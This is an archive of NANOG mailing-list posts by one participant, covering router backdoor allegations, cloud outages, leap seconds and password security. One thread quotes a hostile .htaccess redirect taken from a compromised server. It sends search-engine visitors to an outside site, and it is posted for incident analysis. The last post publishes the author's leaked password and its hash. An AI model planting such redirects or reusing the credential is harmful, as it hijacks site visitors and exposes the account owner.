Re: NSA able to compromise Cisco, Juniper, Huawei switches

2013-12-30 Thread [AP] NANOG

Roland,

I did fail to mention the HUMINT (Human Intelligence) side of things,
thank you for bringing that up!

-- 

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel


On 12/30/13, 11:33 PM, Dobbins, Roland wrote:
> On Dec 31, 2013, at 11:06 AM, [AP] NANOG  wrote:
>
>> Then looking at things from the evil side though, if they owned the system 
>> which provides the signing then they could sign
>> virtually anything they wish.
> Or if they owned *people* with the right level of access to do so, or if 
> there were implementation bugs which could be utilized to bypass or obviate 
> the signing . . .
>
> None of the alleged capabilities described in the purported documents is 
> really standalone; they all rely upon other methods/mechanisms in order to 
> provide the required foundation to accomplish their stated goals.
>
>> I think we need to watch and listen/read over the coming weeks and months 
>> before we go assuming we have it figured out.
> This is the most pertinent and insightful comment made in this thread.
>
> ---
> Roland Dobbins  // <http://www.arbornetworks.com>
>
> Luck is the residue of opportunity and design.
>
>  -- John Milton
>
>
>




Re: NSA able to compromise Cisco, Juniper, Huawei switches

2013-12-30 Thread [AP] NANOG
Sabri,

As I was going through reading all these replies, the one thing that
continued to poke at me was the requirement of the signed binaries and
microcode.  The same goes for many of the Cisco binaries, without direct
assistance, which is unclear at this point through the cloud of smoke so
to speak, it would be difficult to load this code post implementation or
manufacturing.  Then looking at things from the evil side though, if
they owned the system which provides the signing then they could sign
virtually anything they wish.  This is similar to what happened to Red
Hat a number a years ago when they had their repos owned and the
packages were compromised but passed just fine because the signing
server was owned as well.

Not say this is or isn't the case, but I know from my experience were I
worked in an ISP running Juniper routers (M & J Series) coast to coast,
that with the number of eyes watching these devices, it would have to be
done at the firmware level not to be seen by the analysts.  This is not
out of reach either, it was roughly 5-7 years ago when Ethernet cards
were owned with a firmware hack and all the traffic crossing that
interface was seen then reported back.  I know that all the
conversations surrounding this topic were shut down quickly and the
conference talks surrounding it dried up as well, everyone I talked to
was curious why the conversations of such an attack all of a sudden went
silent and have yet to resurface...

I think we need to watch and listen/read over the coming weeks and
months before we go assuming we have it figured out.

Keep in mind the best way to cover up a covert mission is not to cover
it up to start with.  Put it out there, then flood the channels with
false or miss information, until the real mission is so clouded with
miss information you can no longer see the real mission resulting in the
perfect execution of the op.

Just a few thoughts, sorry no answers...

-- 

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel


On 12/30/13, 10:38 PM, Sabri Berisha wrote:
> Hi Roland.
>
>> I don't know much about Juniper
>> gear, but it appears that the Juniper boxes listed are similar in nature,
>> albeit running FreeBSD underneath (correction welcome).
> With most Juniper gear, it is actually quite difficult to achieve 
> wire-tapping on a large scale using something as simple as a backdoor in the 
> BIOS.
>
> Assuming M/MX/T series, you are correct that the foundation of the 
> control-plane is a FreeBSD-based kernel. However, that control-plane talks to 
> a forwarding-plane (PFE). The PFE runs Juniper designed ASICs (which differ 
> per platform and sometimes per line-card). In general, transit-traffic 
> (traffic that enters the PFE and is not destined to the router itself), will 
> not be forwarded via the control-plane. This means that whatever the backdoor 
> is designed to do, simply can not touch the traffic. There are a few 
> exceptions, such as a carefully crafted backdoor capable of altering the 
> next-hop database (the PFEs forwarding table) and mirroring traffic. This 
> however, would mean that the network would already have to be compromised. 
> Another option would be to duplicate target traffic into a tunnel (GRE or 
> IPIP based for example), but that would certainly have a noticeable affect on 
> the performance, if it is possible to perform those operations at all on the 
> target chipset. 
>
> However, attempting any of the limited attacks that I can think of would 
> require expert-level knowledge of not just the overall architecture, but also 
> of the microcode that runs on the specific PFE that the attacker would 
> target, as well as the ability to partially rewrite that. Furthermore, to 
> embed such a sophisticated attack in a BIOS would seem impossible to me with 
> the first reason being the limited amount of storage available on the EEPROM 
> to store all that binary code. 
>
> An attack based on corrupted firmware loaded post-manufacturing would also be 
> difficult due to the signed binaries and microcode. If someone were to embed 
> a backdoor it is extremely difficult without Juniper's cooperation. And the 
> last time I looked at the code (I left Juniper a few months ago), I saw 
> nothing that would indicate a backdoor of any kind. 
>





Re: FYI Netflix is down

2012-07-02 Thread AP NANOG
I believe in my dictionary Chaos Gorilla translates into "Time To Go 
Home", with a rough definition of "Everything just crapped out - The 
world is ending"; but then again I may have hat incorrect :-)


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 2:59 PM, Paul Graydon wrote:

On 07/02/2012 08:53 AM, Tony McCrory wrote:

On 2 July 2012 19:20, Cameron Byrne  wrote:


Make your chaos animal go after sites and regions instead of individual
VMs.

CB


 From a previous post mortem
http://techblog.netflix.com/2011_04_01_archive.html

"
Create More Failures
Currently, Netflix uses a service called "Chaos
Monkey" 


to simulate service failure. Basically, Chaos Monkey is a service that
kills other services. We run this service because we want engineering 
teams

to be used to a constant level of failure in the cloud. Services should
automatically recover without any manual intervention. We don't however,
simulate what happens when an entire AZ goes down and therefore we 
haven't
engineered our systems to automatically deal with those sorts of 
failures.

Internally we are having discussions about doing that and people are
already starting to call this service "Chaos Gorilla".
*"*

It would seem the Gorilla hasn't quite matured.

Tony
From conversations with Adrian Cockcroft this weekend it wasn't the 
result of Chaos Gorilla or Chaos Monkey failing to prepare them 
adequately.  All their automated stuff worked perfectly, the 
infrastructure tried to self heal.  The problem was that yet again 
Amazon's back-plane / control-plane was unable to cope with the 
requests.  Netflix uses Amazon's ELB to balance the traffic and no 
back-plane meant they were unable to reconfigure it to route around 
the problem.


Paul







Re: FYI Netflix is down

2012-07-02 Thread AP NANOG
This is an excellent example of how tests "should" be ran, unfortunately 
far too many places don't do this...


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 12:09 PM, Leo Bicknell wrote:

In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood 
wrote:

from the perspective of people watching B-rate movies:  this was a
failure to implement and test a reliable system for streaming those
movies in the face of a power outage at one facility.

I want to emphasize _and test_.

Work on an infrastructure which is redundant and designed to provide
"100% uptime" (which is impossible, but that's another story) means
that there should be confidence in a failure being automatically
worked around, detected, and reported.

I used to work with a guy who had a simple test for these things,
and if I was a VP at Amazon, Netflix, or any other large company I
would do the same.  About once a month he would walk out on the
floor of the data center and break something.  Pull out an ethernet.
Unplug a server.  Flip a breaker.

Then he would wait, to see how long before a technician came to fix
it.

If these activities were service impacting to customers the engineering
or implementation was faulty, and remediation was performed.  Assuming
they acted as designed and the customers saw no faults the team was
graded on how quickly the detected and corrected the outage.

I've seen too many companies who's "test" is planned months in advance,
and who exclude the parts they think aren't up to scratch from the test.
Then an event occurs, and they fail, and take down customers.

TL;DR If you're not confident your operation could withstand someone
walking into your data center and randomly doing something, you are
NOT redundant.





Re: F-ckin Leap Seconds, how do they work?

2012-07-02 Thread AP NANOG

Do you happen to know all the kernels and versions affected by this?

--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/1/12 12:44 PM, George Bonser wrote:



-Original Message-
From: Roy
Sent: Saturday, June 30, 2012 10:03 PM
To: nanog@nanog.org
Subject: Re: F-ckin Leap Seconds, how do they work?


Talk about people not testing things, leap seconds have been around
since 1961.  There have been nine leap seconds in the last twenty
years.  Any system that can't handle a leap second is seriously flawed.


Roy, this was a problem in only certain kernel versions.  Unfortunately the 
range of versions affected are pretty widely deployed right now.  Earlier and 
later versions did not have the problem.








Re: FYI Netflix is down

2012-07-02 Thread AP NANOG
While I was working for a wireless telecom company our primary 
datacenter was knocked off the power grid due to weather, the generators 
kicked on and everything was fine, till one generator was struck by 
lighting and that same strike fried the control panel on the second 
one.  Considering the second generator had no control panel we had no 
means of monitoring it for temp, fuel, input voltage (when it came 
back), output voltage, surge protection, or ultimately if the generator 
spiked to go full voltage due to a regulator failure.  Needless to say 
we had to shut the second generator down for safety reasons.


While in the military I seen many generators struck by lighting as well.

Im not saying Amazon was not at fault here, but I can see where this is 
possible and happens more frequently than one might think.


I hate to play devils advocate here, but you as the customer should 
always have backups to your backups, and practice these fail-overs on a 
regular basis.  Otherwise you are the fault here, no one else...


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 11:01 AM, Dan Golding wrote:

-Original Message-
From: Todd Underwood [mailto:toddun...@gmail.com]

scott,


This was not a cascading failure.  It was a simple power outage

Actually, it was a very complex power outage. I'm going to assume that what 
happened this weekend was similar to the event that happened at the same 
facility approximately two weeks ago (its immaterial - the details are probably 
different, but it illustrates the complexity of a data center failure)

Utility Power Failed
First Backup Generator Failed (shut down due to a faulty fan)
Second Backup Generator Failed (breaker coordination problem resulting in 
faulty trip of a breaker)

In this case, it was clearly a cascading failure, although only limited in 
scope. The failure in this case, also clearly involved people. There was one 
material failure (the fan), but the system should have been resilient enough to 
deal with it. The system should also have been resilient enough to deal with 
the breaker coordination issue (which should not have occurred), but was not. 
Data centers are not commodities. There is a way to engineer these facilities 
to be much more resilient. Not everyone's business model supports it.

- Dan



Cascading failures involve interdependencies among components.


Not always.  Cascading failures can also occur when there is zero
dependency between components.  The simplest form of this is where

one

environment fails over to another, but the target environment is not
capable of handling the additional load and then "fails" itself as a
result (in some form or other, but frequently different to the mode

of the original failure).

indeed.  and that is an interdependency among components.  in
particular, it is a capacity interdependency.


Whilst the Amazon outage might have been a "simple" power outage,

it's

likely that at least some of the website outages caused were a
combination of not just the direct Amazon outage, but also the flow-

on

effect of their redundancy attempting (but failing) to kick in -
potentially making the problem worse than just the Amazon outage

caused.

i think you over-estimate these websites.  most of them simply have no
redundancy (and obviously have no tested, effective redundancy) and
were simply hoping that amazon didn't really go down that much.

hope is not the best strategy, as it turns out.

i suspect that randy is right though:  many of these businesses do not
promise perfect uptime and can survive these kinds of failures with
little loss to business or reputation.  twitter has branded it's early
failures with a whale that no only didn't hurt it but helped endear the
service to millions.  when your service fits these criteria, why would
you bother doing the complicated systems and application engineering
necessary to actually have functional redundancy?

it simply isn't worth it.

t


   Scott




Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread AP NANOG

On 6/27/12 12:51 PM, Matthew Black wrote:

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

   # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net]
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:

It was not DNS issue, but it was a clear case on how community-support helped.

Some of us may even learn some new tricks. :)

Regards,
as

Sent from mobile device. Excuse brevity and typos.


On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:


On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer wrote:

What made you think it can be a DNS cache poisoning (a very rare

event, despite what the media say) when there are many much more
realistic possibilities (specially for a Web site written in
PHP)?

What was the evidence pointing to a DNS problem?


It seems likely that he made a mistake in his analysis of the evidence.
Something that could happen to anyone when operating outside of a comfort
zone or having a bad day. Go easy.

-DR

G' did they miss anyone in that list of referers :-)

Thanks for posting!

--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel




Re: DNS poisoning at Google?

2012-06-27 Thread AP NANOG
This may not help Matt now, but I just came across this today and 
believe it may help others who have to deal with incidents:


http://cert.societegenerale.com/en/publications.html --> "IRM (Incident 
Response Methodologies)"


If you changed the file contents before noting the  created date, 
modified date, etc. then begin looking at your backups.  This date will 
then help you track down the log entries and finally lead you to the 
root cause.


Also, if possible, please post the culprit code that caused this, 
exif'ing the sensitive data of course :-)


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 6/27/12 7:50 AM, TR Shaw wrote:

On Jun 27, 2012, at 3:36 AM, Michael J Wise wrote:


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:


We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

And done forget there is a trail on that file on your backups.

Tom







Re: How to fix authentication (was LinkedIn)

2012-06-25 Thread AP NANOG

Kyle,

I may be mistaken here, but I don't believe anyone is truly laughing the 
matter off.


There may have been some remarks about second or third parties, but the 
fact does remain these are the areas which current concerns still lay.


--

Robert Miller
(arch3angel)

On 6/24/12 1:02 AM, Kyle Creyts wrote:

I would suggest that multiple models be pursued (since each appears to have
a champion) and that the market/drafting process will resolve the issue of
which is better (which is okay by me:  widespread adoption of any of the
proposed models would advance the state of the norm; progress beats the
snot out of stagnation in my book)

My earlier replies were reprehensible. This is not a thread that should
just be laughed off. Real progress may be occurring here, and at the least,
good knowledge and discussion is accumulating in a way which may serve as a
resource for the curious or concerned.
On Jun 22, 2012 7:25 AM, "Leo Bicknell"  wrote:


In a message written on Thu, Jun 21, 2012 at 04:48:47PM -1000, Randy Bush
wrote:

there are no trustable third parties

With a lot of transactions the second party isn't trustable, and
sometimes the first party isn't as well. :)

In a message written on Thu, Jun 21, 2012 at 10:53:18PM -0400, Christopher
Morrow wrote:

note that yubico has models of auth that include:
   1) using a third party
   2) making your own party
   3) HOTP on token
   4) NFC

they are a good company, trying to do the right thing(s)... They also
don't necessarily want you to be stuck in the 'get your answer from
another'

Requirements of hardware or a third party are fine for the corporate
world, or sites that make enough money or have enough risk to invest
in security, like a bank.

Requiring hardware for a site like Facebook or Twitter is right
out.  Does not scale, can't ship to the guy in Pakistan or McMurdo
who wants to sign up.  Trusting a third party becomes too expensive,
and too big of a business risk.

There are levels of security here.  I don't expect Facebook to take
the same security steps as my bank to move my money around.  One
size does not fit all.  Making it so a hacker can't get 10 million
login credentials at once is a quantum leap forward even if doing
so doesn't improve security in any other way.

The perfect is the enemy of the good.

--
   Leo Bicknell - bickn...@ufp.org - CCIE 3440
PGP keys at http://www.ufp.org/~bicknell/





Re: LinkedIn password database compromised

2012-06-22 Thread AP NANOG
Still playing devils advocate here, but does this still not resolve the 
human factor of "Implementation"?


--

- Robert Miller
(arch3angel)

On 6/22/12 7:43 AM, Robert Bonomi wrote:

Rich Kulawiec  wrote:

On Wed, Jun 20, 2012 at 12:43:44PM -0700, Leo Bicknell wrote:

(on the use of public/private keys)


The leaks stop immediately.  There's almost no value in a database of
public keys, heck if you want one go download a PGP keyring now.

It's a nice thought, but it won't work.   There are two large-scale
security problems which prevent it from working:

1. Fully-compromised/hijacked/botted/zombied systems.  Pick your term,
but any estimate of this population under 100M should be laughed out
of the room.  Plausible estimates are now in the 200M to 300M range.
Any private key present on any of those is accessible to The Bad Guys
whenever they can trouble themselves to grab it.  (Just as they're
already, quite obviously, grabbing passwords en masse.)

The proverbial 'so what' applies?

IF the end-user system is compromised, it *doesn't*matter* what kind of
security is used,  THAT USER is compromised.

However, there is a _MASSIVE_ difference with respect to a 'server-side'
compromise.  One break-in, on *one* machine, can expose tens of millions,
(if not hundreds of millions) of user credentials.


2. Pre-compromised-at-the-factory smartphones and similar.  There's
no reason why these can't be preloaded with spyware similar to CarrierIQ
and directed to upload all newly-created private keys to a central
collection point.

Problem #1 has been extant for ten years and no (meaningful) progress
whatsoever has been made on solving it.

'male bovine excrement' applies to this strawman argument.

Leo made no claim of describing a FUSSP (final ultimate solution to stolen
passwords).  What he did describe was a methodology that could be fairly
easily implemented in the real world, =and= which effectively eliminates
the risk of _server-side_ compromise of a master 'password-equivalent' list.

Leo's proposal _does_ effectively address the risk of server-side compromise.
If implemented, it would effectively eliminate "more than half" of the




Re: Automatic attack alert to ISPs

2012-06-22 Thread AP NANOG

+1 - Took the letters right out from under my fingers :-)

--

- Robert Miller
(arch3angel)

On 6/22/12 4:44 AM, Barry Greene wrote:

Shadowserver.org has a public benefit notification service.

Sent from my iPad

On Jun 22, 2012, at 2:46 PM, Yang Xiang  
wrote:


Argus can alert prefix hijacking, in realtime.
http://tli.tl/argus
Hope to be useful to you.

BR.

在 2012年6月22日星期五,Ganbold Tsagaankhuu 写道:


Hi,

Is there any well known free services or scripts that sends automatic
attack alerts based on some logs to corresponding ISPs (based on src
address)?
I have seen dshield.org and mynetwatchman, but I don't know yet how
good they are.
If somebody has recommendations in this regard please let me know.

thanks in advance,

Ganbold



--
_
Yang Xiang. Ph.D candidate. Tsinghua University
Argus: argus.csnet1.cs.tsinghua.edu.cn




Re: How to fix authentication (was LinkedIn)

2012-06-22 Thread AP NANOG
I used the example I did based on YubiKey, I own one and use it on a 
regular basis.  The real issue I am trying to make is the fact that even 
in the scenario I placed forward it still requires trust.  Trust of a 
person or trust of a company.  This reminds me of a quote:


Only two things are infinite, the universe and 
human stupidity, and I'm not sure about the former.

- Albert Einstein

By no means am I saying any of us, or the majority of the world is 
stupid or uneducated.  However, the inherent nature behind trust is just 
that, relying on some sort of other party is the weak link here.  It 
only takes a single person who has a bad day, or just wants to slack off 
for that day, to create a vulnerability in any password, key, 
encryption, or authentication process hundreds if not thousands of 
people work so hard to solve.


While I used YubiKey as my original example, and use it on a regular 
basis, it still has its downfalls.  It cannot be used with Active Sync, 
so ultimately you can not use it for your Active Directory log in 
because of a small thing called Exchange.  There have been other areas 
were YubiKey has failed but not by it's design, but by the design of the 
application itself.


How can any of our solutions over come the human factor?

--

- Robert Miller
(arch3angel)

On 6/21/12 10:53 PM, Christopher Morrow wrote:

On Thu, Jun 21, 2012 at 10:48 PM, Randy Bush  wrote:

That's basically the Yubikey. It uses a shared key, but since you're
relying on a trusted third party anyway

there are no trustable third parties

note that yubico has models of auth that include:
   1) using a third party
   2) making your own party
   3) HOTP on token
   4) NFC

they are a good company, trying to do the right thing(s)... They also
don't necessarily want you to be stuck in the 'get your answer from
another'

-chris




Re: How to fix authentication (was LinkedIn)

2012-06-21 Thread AP NANOG
I still believe that the final solution should be some sort of two 
factor, something you know (i.e. a passphrase) and something you have 
(i.e. key / token / something which has been verified).


Up till recently RSA was a good platform, but was not very effective for 
smartphone use.


If there is no two factor methodology, which changes, being deployed 
then man in the middle will still work.  So will compromising systems 
and even compromised servers.


What if, and I am brainstorming here, what if there was a hardware 
device which plugged in via USB.  It was programed (i.e verified) in 
person, such as a key signing party.  The serial number of the hardware 
device was all that is stored in the "verified" database with say a 
generic email created at that time with the domain of the verifying 
group.  For example, your serial number is 12345, so the email would be 
generated as 12...@foo.com.  This device is hardware encrypted, and 
stores your password (priv key) in a one way encryption.  Then when you 
go to a website they can ask if you are verified by foo.com.  The users 
selects yes, then the website pulls the public key at that time.  Then 
asks you for your pin, password, pass-phrase, whatever, and at that time 
the users clicks a pretty eye candy button in the browser which looks 
for the USB device with the serial number from the database.  Once found 
it then starts a secure tunnel such as VPN (can be anything just using 
it as a methodology), and no data is transmitted until the tunnel and 
DNSSEC has been established.  Once established you can surf the site as 
normal.  All these connections and tunnels being setup by the browser 
using two factor authentication.  What you know being the public key 
with verification from foo.com, which was also verified in person with 
the foo.com email.  What you have which is the hardware token, again 
serial number verified and encrypted.  Combined to give you access and 
the browser does most the work.


Couple things I see as issues off the bat are:

   Cost of USB device
   Security controls over manufacturing
   In person verification, will require many locations and volunteers -
   Still involves the Human Factor of error or misuse
   Education of the users who are techie
   Browser security
   Browser plugin & functionality
   Change time limit and process (i.e. must be regenerated after x months)
   Complete Revocation of the token and notification to all websites
   using foo.com verification

Again I am just throwing an idea out there to see what others think, 
maybe pieces of everyone's idea may result in an effective solution :-)


Along the lines of iCloud, or any cloud based service.  I am by no means 
a fan of cloud services in any shape or form.  The risks are WAY to 
great to out weigh the benefits.  If someone has a good argument for 
"secure" cloud services I am open to hearing those, but that's an 
entirely different email thread :-)


- Robert Miller
(arch3angel)


On 6/21/12 8:23 AM, Alexander Harrowell wrote:

On Thursday 21 Jun 2012 04:16:22 Aaron C. de Bruyn wrote:

On Wed, Jun 20, 2012 at 4:26 PM, Jay Ashworth  wrote:

- Original Message -

From: "Leo Bicknell" 

Yes, but you're securing the account to the *client PC* there, not

to

the human being; making that Portable Enough for people who use and
borrow multiple machines is nontrivial.

Or a wizard in your browser/OS/whatever could prompt you to put in a
'special' USB key and write the identity data there, making it
portable.  Or like my ssh keys, I have one on my home computer, one on
my work computer, one on my USB drive, etc...  If I lose my USB key, I
can revoke the SSH key and still have access from my home computer.

And I'm sure someone would come up with the 'solution' where they
store the keys for you, but only you have the passphrase...ala
lastpass.

-A


As far as apps go, loads of them use OAuth and have a browser step in
their setup.


So this adds precisely one step to the smartphone sync/activation
process - downloading the key pair from your PC (or if you don't have a
PC, generating one).


that covers vendor A and most vendor G devices. "what about the feature
phones?" - not an issue, no apps to speak of, noOp(). "what about
[person we want to be superior to who is always female for some
reason]?" - well, they all seem to have iPhones now, so *somebody's*
obviously handholding them through the activation procedure.


obviously vendor A would be tempted to "sync this to iCloud"...but
anyway, I repeat the call for a W3C password manager API. SSH would be
better, but a lot of the intents, actions etc are the same.





Re: LinkedIn password database compromised

2012-06-21 Thread AP NANOG
While I am not disagreeing with your statements, nor do I believe they 
will work.  What I am doing is playing devils advocate.  I am hoping to 
stir all of our gray matter for ideas, maybe something said here may end 
up being the fix.


However, which thread do we want to continue this conversation in?

"LinkedIn password database compromised"

or

"How to fix authentication (was LinkedIn)"

:-)

- Robert Miller
(arch3angel)

On 6/21/12 11:05 AM, Leo Bicknell wrote:

I want to start by saing, there are lots of different security problems
with accessing a "cloud service".  Several folks have already brought up
issues like compromised user machines or actually verifing identity.

One of the problems in this space I think is that people keep looking
for a silver bullet that magically solves all the problems.  It doesn't
exist.  We need a series of technologies that work with each other.

In a message written on Thu, Jun 21, 2012 at 10:43:44AM -0400, AP NANOG wrote:

How will this prevent man in the middle attacks, either at the users
location, the server location, or even on the compromised server itself
where the attacker is just gathering data.  This is the same concerns we
face now.

There is a sign up problem.  You could sign up with a MTM web site,
which then signs you up with the real web site.

There are a number of solutions, you can try and prevent the MTM attack
with something like DNSSEC, and/or verify the identity of the web site with
something like X.509 certificates verified by a trusted party.  The
first relationship could exchange public keys in both directions, making
the attack a sign-up attack only, once the relationship is established
its public key in both directions and if done right impervious to a MTM
attack.

Note that plenty of corporations "hijack" HTTPS today, so MTM attacks
are very real and work should be done in this space.


Second is regarding the example just made with "bickn...@foo.com" and
super...@foo.com.  Does this not require the end user to have virtually
endless number of email addresses if this method would be implemented
across all authenticated websites, compounded by numerous devices
(iPads, Smartphones, personal laptop, work laptop, etc..)

Not at all.  Web sites can make the same restrictions they make
today.  Many may accept my "bickn...@ufp.org" key and let me us
that as my login.  A site like gmail or hotmail may force me to use
something like bickn...@gmail.com, because it actually is an e-mail,
but it could also give me the option of using an identifier of my
choice.

While I think use of e-mails is good for confirmation purposes, a
semi-anonymous web site that requires no verification could allow
a signup with "bob" or other unqualified identifier.

It's just another name space.  The browser is going to cache a mapping
from web site, or domain, to identifier, quite similar to what it does
today...

Today:
   www.facebook.com, login: bob, password: secret

Tomorrow:
   www.facebook.com, key: bob, key-public: ..., key-private: ...








Re: LinkedIn password database compromised

2012-06-21 Thread AP NANOG
I have two concerns with this thought, while at the same time intrigued 
by it.


How will this prevent man in the middle attacks, either at the users 
location, the server location, or even on the compromised server itself 
where the attacker is just gathering data.  This is the same concerns we 
face now.


Second is regarding the example just made with "bickn...@foo.com" and 
super...@foo.com.  Does this not require the end user to have virtually 
endless number of email addresses if this method would be implemented 
across all authenticated websites, compounded by numerous devices 
(iPads, Smartphones, personal laptop, work laptop, etc..)


Again I think this conversation is on the right track, but ultimately a 
form of two factor authentication method such as pub/priv, Wikid, etc.. 
is needed.


On 6/20/12 6:28 PM, Leo Bicknell wrote:

In a message written on Wed, Jun 20, 2012 at 03:05:17PM -0700, Aaron C. de 
Bruyn wrote:

You're right.  Multiple accounts is unpossible in every way except
prompting for usernames and passwords in the way we do it now.
The whole ssh-having-multiple-identities thing is a concept that could
never be applied in the browser in any sort of user-friendly way.


Aw come on guys, that's really not hard, and code is already in the
browsers to do it.

If you have SSL client certs and go to a web site which accepts
multiple domains you get a prompt, "Would you like to use identity
A or identity B."  Power users could create more than one identity
(just like more than one SSH key).  Browsers could even generate
them behind the scenes for the user "create new account at foo.com"
tells the browser to generate "bickn...@foo.com" and submit it.  If
I want another a quick trip to the menu creates "super...@foo.com"
and saves it.  When I go to log back in the web site would say "send
me your @foo.com" signed info.

Seriously, not that hard to do and make seemless for the user; it's all
UI work, and a very small amount of protocol (HTTP header probably)
update.

In a message written on Wed, Jun 20, 2012 at 02:54:10PM -0700, Matthew Kaufman 
wrote:

Yes. Those users who have a single computer with a single browser. For
anyone with a computer *and* a smartphone, however, there's a huge
missing piece. And it gets exponentially worse as the number of devices
multiplies.

Yeah, and no one has that problem with a password.

Ok, that was overly snarky.  However people have the same issue
with passwords today.  iCloud to sync them.  Dropbox and 1Password.
GoodNet.  Syncing certs is no worse than syncing passwords.

None of you have hit on the actual down side.  You can't (easily) log in
from your friends computer, or a computer at the library due to lack of
key material.  I can think of at least four or five solutions, but
that's the only "hard" problem here.

This has always failed in the past because SSL certs have been tied to
_Identity_ (show me your drivers license to get one).  SSH keys are NOT,
you create them at will, which is why they work.  You could basically
coopt SSL client certs to do this with nearly zero code provided people
were willing to give up on the identity part of X.509, which is
basically worthless anyway.







Re: LinkedIn password database compromised

2012-06-20 Thread AP NANOG

Exactly!

Passwords = Fail

All we can do is make it as difficult as possible for them to crack it 
until the developers decide to make pretty eye candy.


- Robert Miller
(arch3angel)

On 6/20/12 3:43 PM, Leo Bicknell wrote:

In a message written on Wed, Jun 20, 2012 at 03:30:58PM -0400, AP NANOG wrote:

So the question falls back on how can we make things better?

Dump passwords.

The tech community went through this back in oh, 1990-1993 when
folks were sniffing passwords with tcpdump and sysadmins were using
Telnet.  SSH was developed, and the problem was effectively solved.

If you want to give me access to your box, I send you my public
key.  In the clear.  It doesn't matter if the hacker has it or not.
When I want to log in I authenticate with my private key, and I'm
in.

The leaks stop immediately.  There's almost no value in a database of
public keys, heck if you want one go download a PGP keyring now.  I can
use the same "password" (key) for every web site on the planet, web
sites no longer need to enforce dumb rules (one letter, one number, one
character your fingers can't type easily, minimum 273 characters).

SSL certificates could be used this way today.

SSH keys could be used this way today.

PGP keys could be used this way today.

What's missing?  A pretty UI for the users.  Apple, Mozilla, W3C,
Microsoft IE developers and so on need to get their butts in gear
and make a pretty UI to create personal key material, send the
public key as part of a sign up form, import a key, and so on.

There is no way to make passwords "secure".  We've spent 20 years
trying, simply to fail in more spectacular ways each time.  Death to
traditional passwords, they have no place in a modern world.







Re: LinkedIn password database compromised

2012-06-20 Thread AP NANOG
I normally don't respond and just sit back leeching knowledge, however 
this incident with LinkedIn & eHarmony strikes close to home.  Not just 
because my password was in this list of dumped LinkedIn accounts, but 
the fact that this incident struck virtually every business professional 
and corporation across the world.  Please bare with me while I ramble a 
few thoughts...


The real problem with authentication falls on "trust".  You either have 
to trust the website is storing the data securely or some other party 
will verify you are who you really are.  Just as in the example of the 
DMV.  If you think about your daily life you have put your entire life 
on display for the world.  You trust the DMV with your drivers license 
information, address, social security number, heck they are even asking 
for email now.  If your active or prior military you have given that 
same information, plus DNA and fingerprints.  Think about how much 
information about you and your habits occur from simply using "rewards" 
cards, or "gas points".  You, meaning users, give up your identity 
everyday and with little regard, but when it comes to a website or 
tracking you across websites we throw our hands up and scream "stop".


Please don't get me wrong, I am a HUGE fan boy of privacy and protection 
of data, but responsibility ultimately falls back on the user.  Those 
users who do not know any better are still at fault, but it is our job 
to educate them in better methods of protection.


So the question falls back on how can we make things better?

The fact that we must trust people outside ourselves is key.  We need to 
explain the importance of things such as KeePass (http://keepass.info/), 
and pass-phases, rather than words.  Below is an example, my password 
which was leaked during the LinkedIn dump, but till I started using this 
as an example the likelihood of the hash being cracking it was VERY 
slim.  Use this as an example of how to select a password for websites 
and how even if the hashes are dumped the likelihood of cracking it is slim.


Password:  !p3ngu1n_Pow3r!
SHA1 Hash: b34e3de2528855f02cf9ed04c217a15c61b35657
